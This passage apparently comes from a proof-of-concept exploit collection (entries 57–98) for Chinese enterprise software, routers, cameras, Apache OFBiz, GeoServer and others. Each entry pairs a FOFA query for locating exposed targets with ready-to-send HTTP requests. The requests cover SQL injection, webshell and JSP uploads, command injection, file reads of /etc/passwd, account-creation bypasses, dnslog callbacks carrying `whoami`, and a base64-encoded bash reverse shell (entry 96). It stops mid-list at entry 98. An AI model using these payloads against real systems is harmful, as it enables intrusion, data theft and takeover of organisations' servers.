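The tags are coarse on purpose: the point is to route a request to a human or to an exact-match rule for the endpoint paths listed in this section, not to replace a WAF.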

57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based: comparing the integer 1 with the @@version string fails, and the SQL Server conversion error in the response includes the version string.

58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based in the same way as entry 57; the expected conversion error carries 0xe10adc3949ba59abbe56e057f20f883e.

59. XETUX dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the directory it is written to, and the fileType parameter sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}


GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


/jfhatuwe.php
88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) 综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) 运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen (网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 711

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
